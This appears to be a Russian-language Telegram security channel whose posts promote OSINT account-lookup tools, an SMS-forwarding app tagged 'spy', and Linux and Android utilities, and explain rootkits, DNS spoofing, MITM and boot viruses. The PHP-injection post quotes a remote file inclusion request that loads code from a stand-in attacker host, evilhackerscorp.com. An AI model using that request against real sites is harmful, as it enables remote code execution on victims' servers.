Holehe OSINT
Эффективный поиск зарегистрированных аккаунтов по электронной почте.
Holehe проверяет, привязана ли электронная почта к учетной записи на таких сайтах, как twitter, instagram, imgur и более 120 других.
⏺ Ссылка на GitHub
#OSINT #email
Эффективный поиск зарегистрированных аккаунтов по электронной почте.
Holehe проверяет, привязана ли электронная почта к учетной записи на таких сайтах, как twitter, instagram, imgur и более 120 других.
#OSINT #email
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
PngBin
Инструмент преобразование любых двоичных данных в файл изображения PNG и наоборот.
— Изображение, созданное PngBin, будет иметь все свойства, как и обычное изображение PNG, за исключением того, что при просмотре оно будет выглядеть сломанным и с шумом.
При этом эти изображения можно легко загрузить на любой хостинг изображений и использовать его как файловое хранилище.
⏺ Ссылка на GitHub
#binary #image
Инструмент преобразование любых двоичных данных в файл изображения PNG и наоборот.
— Изображение, созданное PngBin, будет иметь все свойства, как и обычное изображение PNG, за исключением того, что при просмотре оно будет выглядеть сломанным и с шумом.
При этом эти изображения можно легко загрузить на любой хостинг изображений и использовать его как файловое хранилище.
#binary #image
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4
smxi - инструмент командной строки для управления дистрибутивами Linux на основе Debian (кроме Ubuntu подобных)
Каковы возможности данного инструмента:
- Автоматическая установка драйверов GPU вместе с необходимыми патчами (даже nVidia)
- Установка программного обеспечения (от простого пакета до полноценной среды рабочего стола)
- Удаление любого данного программного обеспечения
- Очистка системы (очистка кеша АРТ, удаление старых ядер и модулей ядра и т. Д.)
- Управление и развертывание обновлений системы Обновления ядра / обновления модуля ядра
#Debian #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5
Endeavour OS даёт возможность пользователю без лишних усложнений установить Arch Linux с необходимым рабочим столом в том виде, каким он задуман в своей штатной начинке, предлагаемой разработчиками выбранного рабочего стола, без дополнительных предустановленных программ.
Дистрибутив предлагает простой инсталлятор, где возможно установить один из типовых рабочих столов на основе Mate, LXQt, Cinnamon, KDE Plasma, GNOME, Budgie, а также мозаичных оконных менеджеров і3, BSPWM и Sway. Ведётся работа по добавлению поддержи оконных менеджеров Qtile и Openbox, рабочих столов UKUI, LXDE и Deepin. Xfce стоит по умолчанию.
#Arch #Linux
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5💩1
Полезный, регулярно обновляемый репозиторий для багбаунти, redteam и пентеста, содержащий подборку материалов по различным CVE уязвимостям.
#CVE #PoC
Please open Telegram to view this post
VIEW IN TELEGRAM
Руткит (англ. rootkit, то есть «набор root-а») — набор программных средств (исполняемых файлов, скриптов, конфигурационных файлов), обеспечивающих:
— маскировку объектов (процессов, файлов, каталогов, драйверов);
— управление (событиями, происходящими в системе);
— сбор данных (параметров системы).
Термин Rootkit исторически пришёл из мира UNIX, и под этим термином понимается набор утилит или специальный модуль ядра, которые хакер устанавливает на взломанной им компьютерной системе сразу после получения прав суперпользователя. Этот набор, включает в себя разнообразные утилиты для «заметания следов» вторжения в систему, делает незаметными снифферы, сканеры, кейлоггеры, троянские программы, замещающие основные утилиты UNIX.
#rootkit
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11
DNS-спуфинг, также известный как отравление кэша DNS, является одной из форм взлома компьютерных сетей, в котором данные кэша доменных имен изменяются злоумышленником, с целью возврата ложного IP-адреса.
В статье вы узнаете, о том, что такое DNS-атаки, как они работают и как с ними бороться.
#DNS #spoofing
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5
PHP-инъекция — один из способов взлома веб-сайтов, работающих на PHP. Он заключается в том, чтобы внедрить специально сформированный сценарий в код веб-приложения на серверной стороне сайта, что приводит к выполнению произвольных команд.
— Известно, что во многих распространённых в интернете бесплатных движках и форумах, работающих на PHP (чаще всего это устаревшие версии) есть непродуманные модули или отдельные конструкции с уязвимостями.
Крэкеры анализируют такие уязвимости как неэкранированные переменные, получающие внешние значения. Например, старая уязвимость форума ExBB использовалась запросом:
GET /modules/threadstop/threadstop.php?new_exbb[home_path]=evilhackerscorp.com/tx.txt.
#PHP #Injection
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8
— Вы начнете с базового обзора синтаксиса языка и стоящей за ним философии, после чего перейдете к изучению примеров, которые пригодятся для разработки инструментов.
Вас ждет знакомство с протоколами HTTP, DNS и SMB. Далее вы перейдете к изучению различных тактик и задач, с которыми сталкиваются пентестеры, рассмотрите такие темы, как кража данных, сниффинг сетевых пакетов и разработка эксплойтов.
Вы научитесь создавать динамические встраиваемые инструменты, после чего перейдете к изучению криптографии, атаке на Windows и стеганографии.
#blackhat #books
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🤡1🆒1
Атака посредника, или атака «человек посередине» — вид атаки в криптографии и компьютерной безопасности, когда хакер тайно ретранслирует и при необходимости изменяет связь между двумя сторонами, которые считают, что они непосредственно общаются друг с другом.
— Является методом компрометации канала связи, при котором взломщик, подключившись к каналу между контрагентами, осуществляет вмешательство в протокол передачи, удаляя или искажая информацию.
Одним из примеров атак типа «человек посередине» является активное прослушивание, при котором хакер устанавливает независимые связи с жертвами и передаёт сообщения между ними.
#MiTM #WiFi
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5
PCAPdroid - это приложение Android с открытым исходным кодом, которое позволяет отслеживать и экспортировать сетевой трафик вашего устройства.
— Приложение имитирует VPN для захвата без полномочий root, но, в отличие от VPN, трафик обрабатывается локально на устройстве.
#android #traffic
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4
Сниффинг пакетов - довольно распространённый вид атаки, основанный на работе сетевой карты в режиме promiscuous mode, а также monitor mode для сетей Wi-Fi. В таком режиме все пакеты, полученные сетевой картой, пересылаются на обработку специальному приложению, называемому сниффером.
— В результате хакер может получить большое количество служебной информации: кто, откуда и куда передавал пакеты, через какие адреса эти пакеты проходили.
Самой большой опасностью такой атаки является получение самой информации, например логинов и паролей сотрудников, которые можно использовать для незаконного проникновения в систему под видом обычного сотрудника компании.
#sniffing
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7❤1👌1
Raspirus - это легкий сканер вредоносных программ на основе сигнатур.
Обычные пользователи могут загрузить исполняемый файл для своей операционной системы с веб-сайта или страницы выпуска GitHub. Разработчики могут найти подробные руководства по донастройке Raspirus в документации.
#scan
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7
В этом материале покажем, как перехватить трафик вредоноса, и проанализировать его код, также изучим реверс-инжиниринг.
#Vulnerability
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3👏2
SMS Forwarder - отслеживает SMS-сообщения мобильного телефона Android, входящие вызовы, уведомления приложений и переадресовывает их на другие устройства через Telegram, WeChat, SMS, вебхук, e-mail, PushPlus и множество других сервисов по вашему выбору.
#spy
Please open Telegram to view this post
VIEW IN TELEGRAM
Загру́зочный ви́рус — компьютерный вирус, записывающийся в первый сектор гибкого или жёсткого диска и выполняющийся при загрузке компьютера с идущих после главной загрузочной записи (MBR), но до первого загрузочного сектора раздела. Перехватив обращения к дискам, вирус либо продолжает загрузку операционной системы, либо нет (MBR-Locker). Размножается вирус записью в загрузочную область других накопителей компьютера.
— Выделяют некоторую область диска и делают её недоступной для операционной системы.
— Замещают программу начальной загрузки в загрузочном секторе диска, копируя корректную программу загрузки, а также свой код, в выделенную область диска;
— Организуют передачу управления так, чтобы вначале выполнялся код вируса и лишь затем — программа начальной загрузки.
Загрузочные вирусы были широко распространены в эпоху MS-DOS.
Вирус Brain — первый в истории компьютерный вирус, вызвавший широкую эпидемию, относился именно к классу загрузочных. Во второй половине 1990-х годов в связи с повсеместным использованием 32-разрядных версий Windows загрузочные вирусы временно потеряли свою актуальность.
Однако в 2007 г. появилась новая разновидность вредоносных программ — руткиты, использующие те же технологии заражения дисков, что и загрузочные вирусы.(click: пост о руткитах)
#virus #vulnerability
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3
This media is not supported in your browser
VIEW IN TELEGRAM
OSINT: socialscan
socialscan - инструмент командной строки, для быстрой проверки использования адреса электронной почты и имени пользователя на различных онлайн-платформах.
⏺ Ссылка на GitHub
#Recon #Tools
socialscan - инструмент командной строки, для быстрой проверки использования адреса электронной почты и имени пользователя на различных онлайн-платформах.
#Recon #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
👎3
This media is not supported in your browser
VIEW IN TELEGRAM
BlockchainBay - это инструмент для распространения торрентов , размещенный на блокчейне, совместимом с EVM.
Данная утилита схожа с проектом Pirate Bay, но использует в качестве базы данных EVM-совместимый блокчейн (Ethereum, Polygon, BSC).
— Выше прикрепили видеодемонстрацию данного инструмента.
#Torrent #EVM #Crypto
Please open Telegram to view this post
VIEW IN TELEGRAM
Атака на информационную систему — это совокупность преднамеренных действий хакера, направленных на нарушение одного из трех свойств информации — доступности, целостности или конфиденциальности.
Выделяют три этапа реализации атак:
1. Этап подготовки и сбора информации об объекте атаки.
2. Этап реализации атаки.
3. Этап устранения следов и информации об атаковавшем.
— Классификация атак на информационную систему может быть выполнена по нескольким признакам:
По месту возникновения:
1. Локальные атаки (источником данного вида атак являются пользователи и/или программы локальной системы);
2. Удалённые атаки (источником атаки выступают удалённые пользователи, сервисы или приложения).
По воздействию на информационную систему:
1. Активные атаки (результатом воздействия которых является нарушение деятельности информационной системы);
2. Пассивные атаки (ориентированные на получение информации из системы, не нарушая функционирование информационной системы).
#attack
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
DroidFS - это альтернативный способ использования зашифрованных файловых систем для Android.
— DroidFS использует собственный внутренний файловый проводник вместо монтирования виртуальных томов, с возможностью расшифровки и взаимодействия файлов с другими приложениями, но только с явного согласия пользователя и только через DroidFS.
#Android #manager
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1